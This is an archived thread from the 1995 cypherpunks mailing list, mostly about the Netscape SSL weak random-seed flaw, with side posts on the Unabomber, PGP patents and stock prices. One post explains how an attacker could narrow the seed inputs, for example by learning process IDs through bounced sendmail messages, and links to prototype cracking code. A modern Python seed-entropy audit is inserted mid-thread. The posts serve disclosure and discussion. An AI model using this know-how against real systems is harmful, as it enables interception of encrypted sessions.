Date: Tue, 19 Sep 95 22:18:12 PDT
Subject: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID:

My almost-namesake Sherry Mayo wrote:

>Found this quote from the Electronic Telegraph, the online version of
>a UK daily newspaper. (world news section, Weds 20th Sept)
>http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html
>
>"Editors forced to print manifesto of Unabomber
>
>By Charles Laurence in New York
>
>...The heart of his argument is that industrial society has led to ways of
>life for which people are fundamentally unsuited. He calls for a
>crypto-anarchic revolution and a new order based on small, village-style
>units."
>^^^^^^^^^^^^^^^
>
>Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

I've read a good chunk of FR's work at http://www.ai.mit.edu/misc/unabomber and have to say he is making some very interesting and incisive arguments, not all of which I disagree with. But I also searched the text for mention of "crypto" and only came up with the fairly standard usage of "crypto leftist." My assumption then is that the meme of crypto anarchy has spread to the writer at that UK newspaper (I wonder if Brian Arthur has been talking to them?) and that he interprets FR's screed in terms of crypto anarchy?

Still, his writing style and some of his points seem close enough to some of my own points, not to mention his Northern California nexus and estimated age, that I'm expecting more inquiries (I deflected one already).

After the call from the Sheriff's office about my alleged activities, I wonder....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From cwe at Csli.Stanford.EDU Tue Sep 19 22:24:58 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Tue, 19 Sep 95 22:24:58 PDT
Subject: PGP back in legal limbo? [noise]
In-Reply-To: <9509200359.AA07322@toad.com>
Message-ID: <199509200524.WAA20365@Csli.Stanford.EDU>

| >Since PKP (and Bidzos, now president of RSA) always said that DH
| >covered all public key encryption, it would seem that any RSA
| >licensee would also need a license from Cylink.
|
| So, I suppose this invalidates the RSA agreement that allows PGP to
| be distributed? What "fortunate" timing for the pro GAK folks! Okay,
| everybody in US, erase your copies, before the Feral government comes
| to get you.......

Conspiracy flag on.

Did anyone else but me see the discussion organized by Progress & Freedom Foundation at SPAN, I believe yesterday night. John Barlow from EFF was there, and he said a few things that certainly got my attention. He said that the "borders to cyberspace had to be protected", and that the "fight for freedom in cyberspace was fought right now, not in two years, but right now". And that we should "get encryption be deployed out there, either in Europe [i think he said] or embedded as a kind of holographic image in the Net". He also said that he "expected 'blood' to be shed in this fight" (everything taken from memory, not exact quotes). I was surprised at his intensity and outspokenness. I can't get this kind of statement into agreement with the negative picture several other cypherpunkers have painted of EFF. I wonder whether the effort by EFF to put some sensible input into the official loop is failing, and that is behind his statements? (I haven't seen/heard him make statements earlier, maybe this is his usual way of expression?)

Does anyone but me smell an attempt of rewinding part of the widespread use of PGP, because of a "patent problem"? I got the GAO report on "requirements for the information highway", and they even included a PGP-encrypted email there. The report was rather positive to protect the privacy of the users, noting that it was a fine balance between many interests - not the "law enforcement only" point of view.

Conspiracy flag off.

/Christian

From khijol!erc Tue Sep 19 22:51:44 1995
From: khijol!erc (Ed Carp [khijol SysAdmin])
Date: Tue, 19 Sep 95 22:51:44 PDT
Subject: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To:
Message-ID:

On Tue, 19 Sep 1995, Timothy C. May wrote:

> Still, his writing style and some of his points seem close enough to some
> of my own points, not to mention his Northern California nexus and
> estimated age, that I'm expecting more inquiries (I deflected one already).
>
> After the call from the Sheriff's office about my alleged activities, I
> wonder....

Tim May, the UNABOMBER ... too funny for words, hehehe ;)

--
Ed Carp, N7EKG                  Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key          an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.
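Netscape's statement (a seed smaller than the key it produces), sameer's objection that the clock is not random, and the Fair/Van Wie exchange on statistical tests all turn on one distinction: a generator can pass a black-box frequency test and still have only as many distinct keys as it has distinct seeds. The Python below is an added example, not code from any of the posts or from Netscape; its toy seed function and the pid/ppid/clock windows it assumes are constructed for illustration.

```python
import math
import os
import random
from collections import Counter

KEY_BITS = 128


def toy_seed(pid, ppid, usec):
    """Constructed stand-in for a seed built from guessable process state and
    the clock (not Netscape's code). It is a fixed function of its inputs,
    so it can never carry more entropy than the inputs do."""
    return (pid << 36) ^ (ppid << 20) ^ usec


def toy_keygen(seed, key_bits=KEY_BITS):
    """Stretch a seed into a key_bits-bit key with a deterministic PRNG.
    The output passes simple statistical tests, yet the same seed always
    yields the same key, so the key space is exactly the seed space."""
    return random.Random(seed).getrandbits(key_bits)


def urandom_keygen(key_bits=KEY_BITS):
    """Contrast: a key drawn from the OS entropy pool is not reproducible."""
    return int.from_bytes(os.urandom(key_bits // 8), "big")


def monobit_fraction(keys, key_bits=KEY_BITS):
    """Frequency (monobit) test: fraction of 1 bits over all key material.
    A value near 0.5 is what a black-box statistical check looks for."""
    ones = sum(bin(k).count("1") for k in keys)
    return ones / (len(keys) * key_bits)


def shannon_entropy_bits(values):
    """Shannon entropy of an observed distribution of seed values."""
    counts = Counter(values)
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def min_entropy_bits(values):
    """Min-entropy, the conservative figure a seed audit should use:
    it is driven by the single most likely seed value."""
    counts = Counter(values)
    return -math.log2(max(counts.values()) / len(values))


def seed_space_bits(pid_range, ppid_range, usec_range):
    """Upper bound on seed entropy when an observer knows the scheme and
    can bound each input to the given number of possibilities."""
    return math.log2(pid_range * ppid_range * usec_range)


def effective_key_bits(seed_bits, key_bits=KEY_BITS):
    """Effective strength is the smaller of seed entropy and key length;
    surplus key bits buy nothing against someone who enumerates seeds."""
    return min(seed_bits, key_bits)


def audit(samples=2000):
    """Run the checks side by side on constructed input windows: pid and
    ppid each confined to 2^10 values, clock microseconds to 2^20 values
    (illustrative ranges, not measurements of any real system)."""
    rng = random.Random(1)  # fixed so the figures are reproducible
    seeds = [toy_seed(rng.randrange(1024), rng.randrange(1024),
                      rng.randrange(1 << 20)) for _ in range(samples)]
    keys = [toy_keygen(s) for s in seeds]
    bound = seed_space_bits(1024, 1024, 1 << 20)
    return {
        "monobit": monobit_fraction(keys),            # looks random: about 0.5
        "seed_bits_bound": bound,                     # 40.0, far below KEY_BITS
        "effective_bits": effective_key_bits(bound),  # 40.0, not 128
        "distinct_keys": len(set(keys)),              # equals distinct seeds
        "distinct_seeds": len(set(seeds)),
        "reproducible": toy_keygen(seeds[0]) == keys[0],             # True
        "urandom_reproducible": urandom_keygen() == urandom_keygen(),  # False
    }


if __name__ == "__main__":
    for name, value in audit().items():
        print(f"{name:22s} {value}")
```

The monobit figure shows why a sampling-only check of the kind Erik Fair proposed would not have caught this class of flaw; the seed-space bound is the number an audit has to produce.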
From jsw at neon.netscape.com Tue Sep 19 22:53:59 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 19 Sep 95 22:53:59 PDT Subject: netscape's response In-Reply-To: <199509192304.QAA05546@infinity.c2.org> Message-ID: <43oa83$nhm@tera.mcom.com> In article <199509192304.QAA05546 at infinity.c2.org>, sameer at c2.org (sameer) writes: > " With this knowledge, an experienced computer programmer could > decrypt messages sent by Netscape Navigator to other computers in a > few hours of computation time." > > Excuse me? A few hours? Try 25 seconds?? DISCLAIMER: my comments below are my opinion, and not necessarily the position of Netscape. Yes, it was < 1 minute if you had captured the client-hello message, and had access to the machine that was running the Navigator, and it was a unix machine and it was not an SGI with a high-resolution timer. If the attacker does not have access to the machine to determine the pid and ppid, then the attack will take longer. If the Navigator is running on an SGI machine with a high resolution cycle counter then it is used as the first of the two 32bit seeds. If the Navigator is running on a Mac or PC, then the two seeds are the current time and the "tick count", which is milliseconds since starting windows for the PC version, and some time unit since booting on the Mac. I believe that it would take much longer than 1 minute to mount an attack against a mac, pc, or unix machine that the attacker was not logged on to. I don't know exactly how the few hour number was calculated, since it was done by marketing with input from someone else in the group. Another interesting data point is that the unix version, which was most vulnerable, accounts for less than 10% of our user base, according to the yahoo random link stats. Of course none of this reduces the magnitude of the screw up/bug/design flaw/whatever. I really can't say which of these it was since I wasn't around at the time that this code was being written. 
I must admit that the RNG seed code was not an area that I thought to examine when I took over our security library. This was a bad mistake on our part, and we are working hard to fix it. We have been trying to identify sources of random bits on PCs, Macs, and all of the many unix platforms we support. We are looking at stuff that is system dependent, user dependent, hardware dependent, random external sources such as the network and the user. If anyone has specific suggestions I would love to hear them so that we can do a better job. > "Netscape has also begun to engage an external group of world-class > security experts who will review our solution to this problem before > it is sent to customers." > > A group which offered to review the first version, but > Netscape refused. Do you mean that cypherpunks offered to review the netscape code if only we made all the source available on the net? I think that it is unrealistic to expect us to release all of our source code to the net. We will be having at least some of our code reviewed by a wider audience, but I don't yet know which code, or how wide a review group. If anyone has specific suggestions for pieces of code that you would like to see widely reviewed (such as RNG and seed generation) let me know. I realize that some cypherpunks think that we should make all of our code publicly available. In an ideal world that would be great, but we live in a world with politicians, crooks, lawyers, stockholders, etc... Don't expect to see us posting our entire security library source code to cypherpunks. > From their release it looks like they aren't finding a better > source of entropy, but just using *more* sources of entropy. Doesn't > mean that the entropy is good. I would love to hear your suggestions for good sources of entropy on any systems that our products run on. > A T-shirt to the first person to decompile the new Seed code > and post the sources of "entropy" used. Is this offer good for netscape employees? 
What if I post the code without having had to decompile it? :-) --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From tcmay at got.net Tue Sep 19 23:02:05 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 23:02:05 PDT Subject: NSA and Netscape Crack Message-ID: At 11:46 PM 9/19/95, Jim Ray wrote: >In the relatively short time I've been on this list, Cypherpunks >have bruted, and then found a weakness in, two kinds of Netscape >software. >[A fine public service, IMO. Congrats to all involved.] > >I don't expect to know NSA's specific brute-force capability, but >does anyone know if the NSA has *ever* found a glaring weakness in >software and then told its author(s) or owner(s) about it? Do "we" >perform the "COMSEC" role Tim was speaking of better than the NSA? Indeed, Jim is underscoring the point I was making, facetiously, that the NSA has abandoned all pretense of helping to actually secure commercial transactions (and no, I wasn't referring to Clipper...rather, I was facetiously referring to the short-lived Commercial COMSEC Endorsement Program, circa 1988-89). As I said in my message, I don't _want_ the NSA or NIST (the same, really) to be vetting commercial encryption. But I also don't want them claiming a role in securing commercial encryption when they clearly are not even doing as much as the Cypherpunks are doing. By the way, if we count our own Matt Blaze's work on exposing weaknesses of the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks achievement," then the Cypherpunks have actually played a dominant role in cracking these recent standards. (Not to mention the RC4 code postings, the various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations, etc.) Well done, of course! 
--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From alano at teleport.com Tue Sep 19 23:33:17 1995
From: alano at teleport.com (Alan Olsen)
Date: Tue, 19 Sep 95 23:33:17 PDT
Subject: netscape broken on NPR
Message-ID: <199509200633.XAA18595@desiree.teleport.com>

At 03:06 PM 9/19/95 -0500, you wrote:
>NPR reported on the security flaw in Netscape,
>
>3:05 pm CDT.

As well as CNN Headline news. (With the big Netscape N logo and everything.) They spent a fair amount of time (for CNN Headline news) on the story.

| Minister of Forced Caffinization in the DNRC     | alano at teleport.com  |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
| -- PGP 2.6.2 key available on request --        | behind the keyboard. |
| http://www.teleport.com/~alano                  |                      |

From shields at tembel.org Tue Sep 19 23:49:33 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:49:33 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190748.AAA03614@infinity.c2.org>
Message-ID:

> The server process itself still needs access to that file
> though in order to verify passwords, so it can't be totally
> protected-- a bug in the server might reveal the password file. A
> relatively minor point..

Actually, it could communicate with a differently-privileged process. The security gain probably isn't worth the performance hit, though.

(A possible secure channel: Give the password manager a uid of its own. Have it listen on a unix-domain socket.
The server process opens the socket, then fstat()s it to make sure it's really owned by the password manager.)

--
Shields.

From shields at tembel.org Tue Sep 19 23:52:11 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:52:11 PDT
Subject: Investing on Information We Get Here
In-Reply-To:
Message-ID:

> (These computer lists are really great for investors! I heard about the
> Apple problems a few days before they hit the street, and was able to
> unload a bunch of shares at $45, a day before it dropped, now down to
> around $36. "He who hesitates to act on inside information is lost.")

This isn't inside information in the illegal-to-trade-on-in-the-US sense, is it? cypherpunks, while maybe not mainstream, is publicly available.

--
Shields.

From carolann at censored.org Wed Sep 20 00:02:32 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 00:02:32 PDT
Subject: Netscape closes UNCHANGED!
Message-ID: <199509200701.AAA09989@usr2.primenet.com>

NSCP is currently trading at $53 3/8

Symbol         : NSCP
Exchange       : NASDAQ
Description    : NETSCAPE COMMUNICATIONS CORP COM
Last Traded at : 53 3/8
Date/Time      : Sep 19 4:00
$ Change       : 0
% Change       : 0.000000
Bid            : 53 1/4
Ask            : 53 1/2
Volume         : 373500
# of Trades    : 470
Opening Price  : 49 1/4
Last Shares    : 21
Day Low        : 49
Day High       : 53 1/2
52 Week Low    : 45 3/4
52 Week High   : 74 3/4

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage   The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&
http://dcs.ex.ac.uk/~aba/export/

From shields at tembel.org Wed Sep 20 00:02:52 1995
From: shields at tembel.org (Michael Shields)
Date: Wed, 20 Sep 95 00:02:52 PDT
Subject: MIME
In-Reply-To:
Message-ID:

> I'm dealing with it the same way I'm dealing with the few people who have
> something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to
> treat their text as attachments. Namely, by filtering them out.

Because there were two complaints on this, I'd like to find out why.

I'm using a modified version of Elm, Michael Elkins' 2.4PL24ME4 version. Among other features, this adds integrated PGP support, and uses the content-type application/pgp for it. Here is the complete header on the message I sent, as returned:

: From owner-cypherpunks at toad.com Sun Sep 17 23:26:25 1995
: Return-Path:
: Received: from relay3.UU.NET by yage.tembel.org with smtp
:   (Smail3.1.29.1 #9) id m0suQWm-000HZ2a; Sun, 17 Sep 95 16:41 EDT
: Received: from toad.com by relay3.UU.NET with SMTP
:   id QQzhpy19217; Sun, 17 Sep 1995 16:30:47 -0400
: Received: by toad.com id AA23554; Sun, 17 Sep 95 13:28:04 PDT
: Received: from yage.tembel.org by toad.com id AA23543; Sun, 17 Sep 95 13:27:55 PDT
: Received: by yage.tembel.org (Smail3.1.29.1 #9)
:   id m0suQJV-000HYvC; Sun, 17 Sep 95 20:27 GMT
: Message-Id:
: From: shields at tembel.org (Michael Shields)
: Subject: cypherpunks as a newsgroup
: To: cypherpunks at toad.com
: Date: Sun, 17 Sep 1995 20:27:43 +0000 (GMT)
: X-Dogma: Microsoft is not the answer.
:   Microsoft is the question.
:   No is the answer.
: Mime-Version: 1.0
: Content-Type: application/pgp
: Content-Transfer-Encoding: 7bit
: Sender: owner-cypherpunks at toad.com
: Precedence: bulk
: Content-Length: 1092

I think that it must be the content-type that is causing problems, as the rest of the message is completely standard.

To the people whose mailers broke out in hives at that message: Do you get the same behavior with any message having an unknown content-type?

--
Shields.

From tcmay at got.net Wed Sep 20 00:09:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:09:43 PDT
Subject: netscape's response
Message-ID:

At 5:53 AM 9/20/95, Jeff Weinstein wrote:

> Of course none of this reduces the magnitude of the screw up/bug/design
>flaw/whatever. I really can't say which of these it was since I wasn't
>around at the time that this code was being written. I must admit that
>the RNG seed code was not an area that I thought to examine when I took
>over our security library.

In _retrospect_ (:-}), the approach taken by Goldberg and Wagner seems pretty obvious. Where PGP, for example, asks the user to go through a laborious process of "generating entropy" through ostensibly-random keyboard button presses, Netscape does not do this. Nor does it, for example, "listen" to a microphone input for some amount of time (to at least make a plausible pretense of gathering entropy), nor does it measure a Zener diode, or count clicks of a Geiger counter, or whatever.

The very speed of Netscape's PRNG process suggests the usual weakness in PRNGs: simply not enough entropy. That is, a limited search space allows the guessing of a seed or entry point in a deterministic process.

> This was a bad mistake on our part, and we are working hard to fix it.
>We have been trying to identify sources of random bits on PCs, Macs, and
>all of the many unix platforms we support. We are looking at stuff that
>is system dependent, user dependent, hardware dependent, random external
>sources such as the network and the user. If anyone has specific
>suggestions I would love to hear them so that we can do a better job.

I think a reasonable way to generate several hundred seemingly random (or at least highly unpredictable) bits is the "swirling the mouse" approach mentioned by several people. All implementations of Netscape involve mice, I assume, and this is a fairly fast way of generating hard-to-guess bits. Colin Plumb has code to do this, as has been mentioned.
(I'm not saying that some number of "mouse swirlings" will generate some number of bits of entropy...this depends on the platform, the granularity of mouse measurements, etc. Better to take several times as many bits as needed and distill them down, with MD5 or other hash functions....can't have too many bits of entropy to start with!)

This could be done fairly quickly by Netscape, and doesn't assume the platform has microphones to "measure background noise" or other exotic and nonstandard inputs.

Years ago, I recall articles in sci.crypt about getting "pretty good random numbers" from complicated measurements of disk accesses on a local machine, ticks of the system clock, times between keyboard button presses, etc., all mixed and convolved together. Not perfect, of course, but if enough bits are started with (e.g., 2000) when "only" 126 or 512 or whatever are ultimately used, this "mixing" can probably be pretty damned good. At least, I doubt any t-shirts will be won.

> Do you mean that cypherpunks offered to review the netscape code
>if only we made all the source available on the net? I think that it
>is unrealistic to expect us to release all of our source code to the
>net.
>
> We will be having at least some of our code reviewed by a
>wider audience, but I don't yet know which code, or how wide a review
>group. If anyone has specific suggestions for pieces of code that
>you would like to see widely reviewed (such as RNG and seed generation)
>let me know.
>
> I realize that some cypherpunks think that we should make all of
>our code publicly available. In an ideal world that would be great,
>but we live in a world with politicians, crooks, lawyers, stockholders,
>etc... Don't expect to see us posting our entire security
>library source code to cypherpunks.

I think a better approach is to modularize the functions, so that a "PRNG" chunk could be shown without "damaging" Netscape's market situation.
(I doubt the crypto section is seen as Netscape's market edge, and use of industry-verified crypto modules would be a net plus, anyway.)

In other words, keep secret (arguably) the things you don't want competitors to have access to. But things like crypto modules are rarely trade secrets--if only because the cores are so often licensed anyway--and can be shown and vetted without affecting the rest of the product.

(I said "arguably" because many will argue for showing all of the source code, anyway, as the almost-ultimate check on integrity and reliability. And there may be subtle security flaws that hinge on the overall program, not just specific parts.)

> I would love to hear your suggestions for good sources of entropy
>on any systems that our products run on.

See above. This has been a recurring topic in sci.crypt and Cypherpunks---so recurring, in fact, that several of us have expressed bemusement at seeing "yet another "How do I generate entropy" argument."

I guess we all (save for Messrs. Goldberg and Wagner) tacitly assumed that a modern product claiming to have strong crypto would use commonly-accepted techniques for generating enough entropy. (Commonly used in RSA's crypto products, and in PGP.)

I suggest you take RSADSI up on their offer to advise you. (Or Cylink, as the case may soon be.)

--Tim May

From tcmay at got.net Wed Sep 20 00:12:42 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:12:42 PDT
Subject: Investing on Information We Get Here
Message-ID:

At 6:51 AM 9/20/95, Michael Shields wrote:
>> (These computer lists are really great for investors! I heard about the
>> Apple problems a few days before they hit the street, and was able to
>> unload a bunch of shares at $45, a day before it dropped, now down to
>> around $36. "He who hesitates to act on inside information is lost.")
>
>This isn't inside information in the illegal-to-trade-on-in-the-US sense,
>is it? cypherpunks, while maybe not mainstream, is publicly available.

Didn't you read my last line?

"(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)"

--Tim

From tcmay at got.net Wed Sep 20 00:18:58 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:18:58 PDT
Subject: Netscape sub rosa?
Message-ID:

At 6:33 AM 9/20/95, Alan Olsen wrote:
>At 03:06 PM 9/19/95 -0500, you wrote:
>>NPR reported on the security flaw in Netscape,
>>
>>3:05 pm CDT.
>
>As well as CNN Headline news. (With the big Netscape N logo and
                                          ^^^^^^^^^^^^^^^^^^^
>everything.) They spent a fair amount of time (for CNN Headline news) on
>the story.

Gee, where's that "Cypherpunks logo" when you really need it? A rose covering the Netscape "N" logo? A crypto eagle swooping down and pecking at weak keys?

Netscape sub rosa?

--Tim May

From cwe at Csli.Stanford.EDU Wed Sep 20 00:29:33 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Wed, 20 Sep 95 00:29:33 PDT
Subject: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200729.AAA24565@Csli.Stanford.EDU>

| Of course none of this reduces the magnitude of the screw up/bug/design
| flaw/whatever. I really can't say which of these it was since I wasn't
| around at the time that this code was being written. I must admit that
| the RNG seed code was not an area that I thought to examine when I took
| over our security library.

It isn't really easy. I guess you were around to see the pointer to RFC 1750, approx "Security Randomness reqs"?

| This was a bad mistake on our part, and we are working hard to fix it.
| We have been trying to identify sources of random bits on PCs, Macs, and
| all of the many unix platforms we support. We are looking at stuff that
| is system dependent, user dependent, hardware dependent, random external
| sources such as the network and the user. If anyone has specific
| suggestions I would love to hear them so that we can do a better job.

* I think you should use as much user-generated randomness as possible, like the mouse movement patterns, interarrival times of events from the user interface etc.

* You can also gather statistics from the networking card, like number of collisions, packets in/out, number of passing packets etc.

* Measuring the interarrival times of requests/responses from a remote server should also be a good one, I guess. It depends on the network in between, the actual processes executing on it, the scheduling algorithm etc.
* And finally, insert some sampling of the noise in the sound blaster.

* And try to reseed it, as often as possible and convenient. Make it depend on the previous value of the random generator seed, somehow.

The difficult part is to verify the quality of the random seeding and reseeding. How does it behave on an unloaded system? Could someone put your system under some strain, and hence affect the random generator to lock down into a small subspace or even onto a fixed value? How independent are the values anyway? And when you start to talk about ergodicity etc, I'm lost anyway. :-)

I think it is important to bring together factors of the user _and_ the environment, preferably an environment that reaches as far from the local site as possible. This makes "jamming" of the random seed selection process harder.

The other problem in gathering random bits for a seed is that most bits are visible by someone else close enough within your environment. Interarrival times of packets are fine, but anyone can observe them with quite a good accuracy. How do you escape the "local environment problem"?

. - .

One wild idea that I just got was to have servers and clients exchange random numbers (not seeds of course), in a kind of chaining way. Since most viewers connect to a number of servers, and all servers are connected to by many clients, they would mix "randomness sources" with each other, making it impossible to observe the local environment only. And the random values would of course be encrypted under the session key, making it impossible to "watch the wire".

Problems:

* watch out for "multiply by zero" attacks by a rogue server/client.
* watch out for "almost singular values" in the same way.
* only let one source contribute a certain amount of randomness, like (key length)/(aver # of peers).
* never reveal your current seed, only a non-trivially derived random value from it. (of course)
* make sure your initial seed is good enough, or the whole thing is broken.
* perhaps save part of the previous session state into a protected file, to be able to keep up the quality of the initial seed.

I think I like it, perhaps not from a practical point of view as much as the 'non-attackability' of it. It's quite cypher-a. But I bet someone has already done this a long time ago. My usual luck! :-( If not, I want a 'I saved Netscape!' t-shirt from you, Jeff!

/Christian

PS. I'm a Swede, I don't know if I'm allowed to reveal these state secrets. So please shut your eyes, ok?

From dawagner at flagstaff.princeton.edu Wed Sep 20 00:29:58 1995
From: dawagner at flagstaff.princeton.edu (David A. Wagner)
Date: Wed, 20 Sep 95 00:29:58 PDT
Subject: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43o47v$fsd@cnn.Princeton.EDU>

It looks like there's some confusion about the Netscape security problem Ian Goldberg (iang at cs.berkeley.edu) and I found, as mentioned recently on cypherpunks. If we'd foreseen that such a silly bug would receive so much attention, I think we would've tried to prepare a more comprehensive description... But we didn't. Anyhow, let's see what I can clear up for you now.

[Note: Ian isn't here right now, so he hasn't had a chance to look at this. Any errors are mine, any opinions are mine, etc.]

In article from sci.crypt, David Sternlight wrote:
> If the above is, in fact, accurate it appears to apply to previous
> versions of Netscape, not the 2.0 versions for which the public beta goes
> out next week.

We haven't tried it on v2.0, as we only have a copy of v1.1 right now. But the front-page New York Times article today said that the next version also has the same flaw, and that it'll be fixed before release.
A Netscape official press release is available at
http://www.netscape.com/newsref/std/random_seed_security.html

Also our prototype code can be found at
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c

> In addition the flat statement that "keys can now be found
> in appx 1 min." is not, as it seems, a general one but (if one reads the
> details) requires a number of special assumptions, applies only to some
> machines, and applies only if one can develop certain collateral
> information.

You are partially correct. It all depends on the threat model.

If the attacker has user-level access (e.g. an account) on the machine where you run Netscape, your encrypted sessions can be broken quickly. (Our tools took about 1 minute on 1 machine, but it was just a proof of concept -- I believe the time could be significantly reduced, and automated completely.) This model is not entirely unreasonable IMHO.

If the attacker is simply sniffing the wire somewhere between you and the https: server, and has no account on your machine, things are a bit more complicated. Ian & I are still discussing this case, but I'll mention a few of our observations:

* the time, pid, and ppid are mixed together in such a way that there is certainly no more than 47 bits of entropy (which is a far cry from the 128 bits claimed for their commercial domestic version).
* the attacker can guess the current time to within a few seconds easily.
* maybe the attacker can get this down to about 10 msec uncertainty, possibly even less in some cases.
* the ppid is often 1 (e.g. when you start up Netscape from an X-windows menu).
* if not 1, the ppid is often just a bit smaller than the pid.
* on personal workstations, the pid and ppid are often quite small.
* one can remotely determine pid's by talking to sendmail on the attacked machine and bouncing mail -- the pid will usually be in the Message-ID.
  (if the attacker host runs sendmail, which is a usual case) because pids are assigned sequentially, this leaves very little uncertainty in Netscape's pid.
* there's no notion of pid or ppid on MS-DOS: God only knows what Netscape does there. maybe it's just seeded from the time!!
* the PRNG is never reseeded for the duration of a cached connection.

While we don't yet know exactly how long it would take to break Netscape's PRNG in this threat model, I think it's clear that Netscape's current implementation is insufficient and insecure.

You mention that our attack is only applicable to certain machines. You may well be correct -- this is one area where our experiments were still proceeding when the media descended on us today. Certainly the Solaris 2.0 and HP-UX versions of Netscape v1.1 are vulnerable: we tested them ourselves. Ian told me he got email from people who are trying unssl.c on other architectures, and apparently the SunOS 4.x.x version is vulnerable too (and tests of other machines are in progress). We don't know about e.g. PC's yet -- this is another area we were still working on. I will note that Netscape didn't try to claim that any version was safe from this flaw, for what that's worth...

Hopefully this will be quickly fixed by Netscape, and then we can all stop worrying about it! :-)

David Wagner, daw at cs.berkeley.edu, speaking {for,to} himself

From cwe at Csli.Stanford.EDU Wed Sep 20 00:38:41 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Wed, 20 Sep 95 00:38:41 PDT
Subject: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To:
Message-ID: <199509200738.AAA25102@Csli.Stanford.EDU>

| On Tue, 19 Sep 1995, Timothy C. May wrote:
|
| > Still, his writing style and some of his points seem close enough to some
| > of my own points, not to mention his Northern California nexus and
| > estimated age, that I'm expecting more inquiries (I deflected one already ).
| >
| > After the call from the Sheriff's office about my alleged activities, I
| > wonder....
|
| Tim May, the UNABOMBER ... too funny for words, hehehe ;)

A frame-up, I bet! What bothers me is that it makes sense from a certain twisted kind of view. Discrediting the group that actually is a problem when it comes to ITAR, and recently has had good publicity. And Tim being one of those who spotted Clipper coming, early on. And the punch line; "Look the terrorists and the crypto anarchists are the SAME guys!"

(Tim, not that I agree with your political views, but many Swedes are like that. ;-) )

Why is it that my conspiratorial side has blossomed once I joined this group? I've posted more severely conspiratorial posts recently than I've done in my whole previous Inet presence. I gotta stop. :-)

/Christian

From sameer at c2.org Wed Sep 20 00:45:44 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 00:45:44 PDT
Subject: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200740.AAA15940@infinity.c2.org>

> Is this offer good for netscape employees? What if I post the code
> without having had to decompile it? :-)
>

That depends on whether or not you do it with the approval of your superiors. ;-)

Seriously, if you manage to convince the management/whoever-needs-to-decide a significant portion of the security code can be released for public scrutiny, you deserve a t-shirt. The goal here is to have a piece of software we can trust.

--
sameer                                        Voice:   510-601-9777
Community ConneXion                           FAX:     510-601-9734
An Internet Privacy Provider                  Dialin:  510-658-6376
http://www.c2.org (or login as "guest")       sameer at c2.org

From jsw at netscape.com Wed Sep 20 00:58:27 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 00:58:27 PDT
Subject: netscape's response
In-Reply-To:
Message-ID: <9509200055.ZM206@tofuhut>

Just a clarification of my last message.
I didn't mean to imply that we didn't know about using time/position from mouse events, RFC 1750, reading from the microphone. I knew all about this stuff, but made the fatal mistake of assuming that what we shipped in 1.1 was "good enough", and that I could look at it later, after I had dealt with a bunch of other stuff that needed to be done.

So far I've received several very thoughtful replies, with lots of good suggestions, most of which I already knew about, but some new ones too. Thanks to those who have responded already, and also to those who will respond. I'm sorry, but I can't guarantee an individual response...

--Jeff

From sameer at c2.org Wed Sep 20 01:17:15 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 01:17:15 PDT
Subject: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200812.BAA17876@infinity.c2.org>

>
> If the attacker does not have access to the machine to determine the
